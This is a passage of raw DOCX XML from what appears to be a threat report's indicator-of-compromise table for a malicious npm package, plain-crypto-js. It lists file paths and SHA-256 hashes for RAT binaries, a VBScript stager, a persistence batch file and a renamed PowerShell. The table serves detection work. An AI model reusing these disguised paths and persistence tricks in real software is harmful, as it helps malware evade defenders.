            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5146" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAE8" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Static path used across all platform variants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="278CFAEA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="140"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2D5A9E"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Filesystem Indicators</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="100" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:bottom w:w="100" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1259"/>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="1618"/>
        <w:gridCol w:w="4497"/>
      </w:tblGrid>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAEF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="125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EB" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981"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EC" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="161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ED" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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AEE" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAF4" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="125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0" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>All</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981"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1" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>node_modules</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>/plain-crypto-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>js</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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2" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Malicious dependency directory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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3" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAF9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1259" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAF5" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAF6" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>/Library/Caches/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>com.apple.act.mond</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAF7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Native RAT binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAF8" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFAFE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="125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A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981"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B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>%TEMP%\6202033.vbs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>VBScript stager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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AFD" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB03" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1259" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFAFF" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB00" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>%TEMP%\6202033.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB01" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PowerShell RAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB02" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB08" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="125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04" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981"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05" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>%TEMP%\6202033.ps1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16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06" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PowerShell RAT (variant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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07" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB0D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1259" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB09" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB0A" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>%PROGRAMDATA%\system.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1619" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB0B" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Persistence artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4500" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="278CFB0C" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB12" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="125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0E" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1981"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0F" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
              </w:rPr>
              <w:t>%PROGRAMDATA%\wt.exe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="161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10" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Renamed PowerShell (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LOLBin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="450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11" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="009764A3">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009764A3" w14:paraId="278CFB17" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1259" w:type="dxa"/>
            <w:tcBorders>
